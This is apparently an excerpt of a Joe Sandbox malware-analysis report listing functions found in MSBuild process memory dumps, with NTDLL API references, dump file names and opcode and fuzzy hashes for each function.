Function 010D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01109864,?,00000000,00000000,00000000,?,00000000,?,?,00000000,?,010D034A,?,?,?,00000003), ref: 010D2ADA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe04a41bc8894d3e414f73de43c5b22314165cb4f83bdbf9bb1aefdee09cdcd0
Instruction ID: 3074f8c4099e0fd608ed2754105a4bc964b99d62f9ffde1287fa9e4670b33f6a
Opcode Fuzzy Hash: fe04a41bc8894d3e414f73de43c5b22314165cb4f83bdbf9bb1aefdee09cdcd0
Instruction Fuzzy Hash: A1900435311400071105F55D470C50740C7D7D535135DC033F1415550CD731CD715331

Function 010D2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0111B508,00000004,000000FF,0000001E,00000000,00000000,00000000,C0000409,00000001,00000000,00000004,00000004,000F0007,C0000001,?,00000004), ref: 010D2D1A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7bbf9339b8fa3671be2ee8921f563cf09621648f03cc0dcfeb48575b6bdf47b6
Instruction ID: 096f11c46cbbfaddb7d137ef13e27ba29f2d382be248777935912bb65e51e0d2
Opcode Fuzzy Hash: 7bbf9339b8fa3671be2ee8921f563cf09621648f03cc0dcfeb48575b6bdf47b6
Instruction Fuzzy Hash: 4890022921340006E1807159940C60A404597D1202F99D416A0415558CC91589695321

Function 010D2D30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010BA52A,000000FF,?,011867F8,0116C9A0,00000020,010BA460,0118689C,00000000,0000001D,?,00C02B88), ref: 010D2D3A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee10d51fbfcafad4f4a37cb344457aef3a4100e9ea50ec9136f9234032fc7035
Instruction ID: 169c445345ec93c8e6ebf743bd81a45f32aed956d06a93f892d76cca19527e0b
Opcode Fuzzy Hash: ee10d51fbfcafad4f4a37cb344457aef3a4100e9ea50ec9136f9234032fc7035
Instruction Fuzzy Hash: F790022130140007E1407159941C6068045E7E1301F59D012E0814554CD91589565322

Function 010D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010E91A3,00000000,00000000,?,?,?,01098A1A,0116C2B0,00000018,01088873), ref: 010D2DDA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 429c52cdf377eae6bd05683a49091c1625fef5f796609851aa20fa2c38f527e2
Instruction ID: a2e2f3602f49364c7420dcc2e1e09f3c08667b881c553f18695f29f5235e5c16
Opcode Fuzzy Hash: 429c52cdf377eae6bd05683a49091c1625fef5f796609851aa20fa2c38f527e2
Instruction Fuzzy Hash: 49900221242441566545B15984085078046A7E0241799C013A1814950CC5269956D721

Function 010D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0110E73E,0000005A,0116D040,00000020,00000000,0116D040,00000080,010F4A81,00000000,?,?,00000002,00000000,?,?,010DAE00), ref: 010D2DFA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fae70f94d7aadc467095ca641ef50def674a882c4125fed8f76f8c5bbc2f29c3
Instruction ID: d1892022c90a1a9706407d5ed314488a2ed77234e8732fc8e543c249e6137212
Opcode Fuzzy Hash: fae70f94d7aadc467095ca641ef50def674a882c4125fed8f76f8c5bbc2f29c3
Instruction Fuzzy Hash: C290023120140417E11171598508707404997D0241F99C413A0824558DD6568A52A221

Function 010D2C1D Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010EFD4F,000000FF,00000024,01186634,00000004,00000000,?,-00000018,7D810F61,?,?,010A8B12,?,?,?,?), ref: 010D2C24

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7307c215e67f9025e485d23ab2fd9e310ef2845d9050980c95fb250cdb82dc75
Instruction ID: 9e9bab5f07cbf60e9f84811126991790a9198521617c6852403c86d6b45bb476
Opcode Fuzzy Hash: 7307c215e67f9025e485d23ab2fd9e310ef2845d9050980c95fb250cdb82dc75
Instruction Fuzzy Hash: 36A0023140221547D241AA1948448BBE198BAD021134DC357E2468441A472816A1B6B2

Function 010D2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0108FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,010E7BE5,00001000,00004000,000000FF,?,00000000), ref: 010D2C7A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebe1e117e1f4d7a4540c903a34412a98d34f41f804670e05fc1b0f2fe480a2ea
Instruction ID: fccd2cb810ee999ee02f86db3fe24599769989c0710bbd468755eed40fdcdecd
Opcode Fuzzy Hash: ebe1e117e1f4d7a4540c903a34412a98d34f41f804670e05fc1b0f2fe480a2ea
Instruction Fuzzy Hash: D290023120148806E1107159C40874A404597D0301F5DC412A4824658DC69589917221

Function 010D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010B3999,000000FA,00000001,?,00000050,?,?), ref: 010D2CAA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7691d64eeb91abad76e48e08871c11c599925d4a197b426ddb0ab4bf1c55d188
Instruction ID: 80744ee7e49ef65745e2760608c93a36636be4afc62eccb3a822bb3594175f5e
Opcode Fuzzy Hash: 7691d64eeb91abad76e48e08871c11c599925d4a197b426ddb0ab4bf1c55d188
Instruction Fuzzy Hash: D390023120140406E1007599940C646404597E0301F59D012A5424555EC66589916231

Function 010D2F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0111B4E6,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000000,00000000,00000000,00000058), ref: 010D2F3A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5183129a95234ca4e9ebb20e088bbb8c947f38b3ea8d9b2687a4840d87823c9c
Instruction ID: d038bcd4ffc6b1aa7296aa23e3694def6911761778b1ad4445f961c6de08e75c
Opcode Fuzzy Hash: 5183129a95234ca4e9ebb20e088bbb8c947f38b3ea8d9b2687a4840d87823c9c
Instruction Fuzzy Hash: 0590026134140446E10071598418B064045D7E1301F59C016E1464554DC619CD526226

Function 010D2F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0110CF47,000000FF,?,?,00000000,?,00000000,?,?), ref: 010D2F9A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 599489a33baa95dca89814614f137038bb63953de3d4cd9f5b302a9afdba2f91
Instruction ID: 4b5ff132526725ff4d24f56453d8b706a480bae8df995f4d46928ff535fae3c3
Opcode Fuzzy Hash: 599489a33baa95dca89814614f137038bb63953de3d4cd9f5b302a9afdba2f91
Instruction Fuzzy Hash: 7090023120180406E1007159881870B404597D0302F59C012A1564555DC62589516671

Function 010D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(010D05E3,00000000,00000000,00000001,00000000,00000000,00000000,?,010D2380,010D03B6,00000000,00000000,?,00000000,?), ref: 010D2FBA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dab66d194d3d33b341eb85eb7710040a1e71e2cb8de3e059df3d2b9dec74e899
Instruction ID: 562283ba2c909c2fc9402a03c85c610b41894f6ffbe04d96d71ccf3cf40ab5a0
Opcode Fuzzy Hash: dab66d194d3d33b341eb85eb7710040a1e71e2cb8de3e059df3d2b9dec74e899
Instruction Fuzzy Hash: 529002216014004651407169C8489068045BBE1211759C122A0D98550DC55989655765

Function 010D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(010D17E5,00000001,C0100080,00000018,?,00000000,00000080,00000005,000000FE,00000068,00000000,00000000,?,00000000,00000000,?), ref: 010D2FEA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ab6a3c3524d265846cbe1d20aac3a382d66920948f088b43eaf817c17f0bc5d
Instruction ID: 18ffe0c5a7aace66e27ff00c03340c85b34816b6d32a74e11c4a396687c76b39
Opcode Fuzzy Hash: 6ab6a3c3524d265846cbe1d20aac3a382d66920948f088b43eaf817c17f0bc5d
Instruction Fuzzy Hash: D5900221211C0046E20075698C18B07404597D0303F59C116A0554554CC91589615621

Function 010D2E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0111809B,?,?,?,?,?), ref: 010D2E8A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab43009443e183bc56b8b5b01c32102db7ba42965865d575df7064b3839dac0c
Instruction ID: 67de822a67527fe079cd90d4b078cce2f373032334562a9f60add8a7b6ad0a02
Opcode Fuzzy Hash: ab43009443e183bc56b8b5b01c32102db7ba42965865d575df7064b3839dac0c
Instruction Fuzzy Hash: 8390022160140506E10171598408616404A97D0241F99C023A1424555ECA258A92A231

Function 010D2EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010F1B8A,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?), ref: 010D2EAA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 605ce908d29410c9d46ef16c035c8015a4aeb0188a9d5a9bb9fe3ca2a249dd7b
Instruction ID: 85e6bf735730ee592dcb9e19107111a89e540a6701a7b34ae30f1710b1e4c47b
Opcode Fuzzy Hash: 605ce908d29410c9d46ef16c035c8015a4aeb0188a9d5a9bb9fe3ca2a249dd7b
Instruction Fuzzy Hash: 3090027120140406E14071598408746404597D0301F59C012A5464554EC6598ED56765

Function 0041F06D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1638113392.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_41f000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction ID: bbcd9e0c7495b4b3c71782add9bd9e92ecbfcf2a3e8267f7fc475ee2e27bc91e
Opcode Fuzzy Hash: 02b2a21052558e81bac1299893efe0f5989b8ec20f12056ef22405cdcc0cabd1
Instruction Fuzzy Hash: 63B0127495531E03041035B0264316977148581408B0003999DCC0F192EE01842302C3

Function 0041F070 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1638113392.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_41f000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction ID: 799c57cb42787c0bf5d1ce17ac39346a2abfc1e09e798fb22bcb30c317675207
Opcode Fuzzy Hash: f0823cfae073da212eb333ff970e5c6e7a9f36da7609cc17c3dd2c68a5e4798d
Instruction Fuzzy Hash: A2A022A0C2830C03002030FA2B03023B30CC000008F8003EAAE8C022223C02A83300EB

Non-executed Functions

Function 0109648B Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1dec7de272a9419bc68af630b7e5dad04497ba7b28af5fce6bdc17ad2569d7
Instruction ID: 3d18629b64367a00bc3afa6ca31c1124c8496db5abb83fb79dde6f5247884eff
Opcode Fuzzy Hash: 4c1dec7de272a9419bc68af630b7e5dad04497ba7b28af5fce6bdc17ad2569d7
Instruction Fuzzy Hash: 1B31C331600785CFDBB2CF28C582BA677E5EF05B50F1444B9E9C88B94AC7369849DB80

Function 010D4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010D4A8F

Strings

0Ivw, xrefs: 010D4AFA
0Ivw, xrefs: 010D4B14
0Ivw, xrefs: 010D4AD0, 010D4AD5
0Ivw, xrefs: 010D4B04, 010D4B09
0Ivw, xrefs: 010D4ADA
0Ivw, xrefs: 010D4AEA, 010D4AEF

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
API String ID: 3446177414-4119021165
Opcode ID: 64b48a1072887a560de232612ea226d9cdb689a6b4520afb453692fdf6f97da0
Instruction ID: 412f246b835fdb821f1ba12d4abb9d7dc9cab8b15864298df8848956dd038d06
Opcode Fuzzy Hash: 64b48a1072887a560de232612ea226d9cdb689a6b4520afb453692fdf6f97da0
Instruction Fuzzy Hash: 9C01D232E083485AD72CAA2C79047AE3BD5B3C4B3CF15C0A9E958EF284D37048C2DB90

Function 010D2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 010D293C
___swprintf_l.LIBCMT ref: 010D295E
___swprintf_l.LIBCMT ref: 010D29A3
___swprintf_l.LIBCMT ref: 0110A52E

Memory Dump Source

